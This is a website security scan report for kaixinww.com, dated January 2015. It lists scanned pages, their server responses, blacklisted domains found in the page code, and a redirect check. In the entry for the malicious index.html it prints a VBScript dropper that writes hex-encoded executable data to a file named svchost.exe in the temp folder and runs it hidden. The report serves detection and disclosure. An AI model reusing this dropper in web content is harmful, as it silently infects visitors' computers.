Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kaixinww.com
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://kaixinww.com/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 17:46:04 GMT Accept-Ranges: bytes ETag: "98d4667da023d01:1657" Server: Microsoft-IIS/6.0 Content-Length: 124170 Content-Location: http://kaixinww.com/index.html Content-Type: text/html Last-Modified: Mon, 29 Dec 2014 19:48:59 GMT | clean |
http://kaixinww.com/index.html | 200 OK Content-Length: 124170 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://kaixinww.com/html/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 17:46:07 GMT Accept-Ranges: bytes ETag: "4e5fe1fc529d01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135733 Content-Location: http://kaixinww.com/html/index.html Content-Type: text/html Last-Modified: Tue, 06 Jan 2015 15:25:54 GMT | clean |
http://kaixinww.com/html/index.html | 200 OK Content-Length: 135733 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: idiaoci.com | ||
http://baidu.nvdei.com/js/a.js | 200 OK Content-Length: 745 Content-Type: application/x-javascript | clean |
http://kaixinww.com/about/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 17:46:13 GMT Accept-Ranges: bytes ETag: "a84ff12b4029d01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135206 Content-Location: http://kaixinww.com/about/index.html Content-Type: text/html Last-Modified: Mon, 05 Jan 2015 23:34:38 GMT | clean |
http://kaixinww.com/about/index.html | 200 OK Content-Length: 135206 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hslygj.com | ||
http://kaixinww.com/chanpin/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 17:46:17 GMT Accept-Ranges: bytes ETag: "ce5fbdc4492ad01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135126 Content-Location: http://kaixinww.com/chanpin/index.html Content-Type: text/html Last-Modified: Wed, 07 Jan 2015 07:15:51 GMT | clean |
http://kaixinww.com/chanpin/index.html | 200 OK Content-Length: 135126 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hyjfqs.com | ||
http://kaixinww.com/news_cn/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 17:46:20 GMT Accept-Ranges: bytes ETag: "4a27c9a9ce2ad01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135978 Content-Location: http://kaixinww.com/news_cn/index.html Content-Type: text/html Last-Modified: Wed, 07 Jan 2015 23:07:09 GMT | clean |
http://kaixinww.com/news_cn/index.html | 200 OK Content-Length: 135978 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ghds-ok.com | ||
http://kaixinww.com/contact/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 17:46:23 GMT Accept-Ranges: bytes ETag: "68f1f08c532bd01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135453 Content-Location: http://kaixinww.com/contact/index.html Content-Type: text/html Last-Modified: Thu, 08 Jan 2015 14:58:24 GMT | clean |
http://kaixinww.com/contact/index.html | 200 OK Content-Length: 135453 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: dftx.net | ||
http://kaixinww.com/guest/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 17:46:26 GMT Accept-Ranges: bytes ETag: "2e8db284d82bd01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135727 Content-Location: http://kaixinww.com/guest/index.html Content-Type: text/html Last-Modified: Fri, 09 Jan 2015 06:50:13 GMT | clean |
http://kaixinww.com/guest/index.html | 200 OK Content-Length: 135727 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: jst178.com | ||
http://kaixinww.com/guest/0.html | 200 OK Content-Length: 17086 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ayzxkm.com | ||
http://kaixinww.com/news/ | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://kaixinww.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://kaixinww.com/items/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 17:46:36 GMT Accept-Ranges: bytes ETag: "769f6845da2bd01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135804 Content-Location: http://kaixinww.com/items/index.html Content-Type: text/html Last-Modified: Fri, 09 Jan 2015 07:02:46 GMT | clean |
http://kaixinww.com/items/index.html | 200 OK Content-Length: 135804 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: dftx.net | ||
http://kaixinww.com/items/0.html | 200 OK Content-Length: 16878 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hyjfqs.com | ||
http://kaixinww.com/items/1.html | 200 OK Content-Length: 16427 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ahitshop.com | ||
http://kaixinww.com/news/3283.html | 200 OK Content-Length: 16309 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: bjyadu.com |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kaixinww.com
Result:
HTTP/1.1 200 OK
Date: Tue, 13 Jan 2015 17:46:04 GMT
Accept-Ranges: bytes
ETag: "98d4667da023d01:1657"
Server: Microsoft-IIS/6.0
Content-Length: 124170
Content-Location: http://kaixinww.com/index.html
Content-Type: text/html
Last-Modified: Mon, 29 Dec 2014 19:48:59 GMT
...124170 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kaixinww.com
Referer: http://www.google.com/search?q=kaixinww.com
Result:
The result is similar to the first query. There are no suspicious redirects found.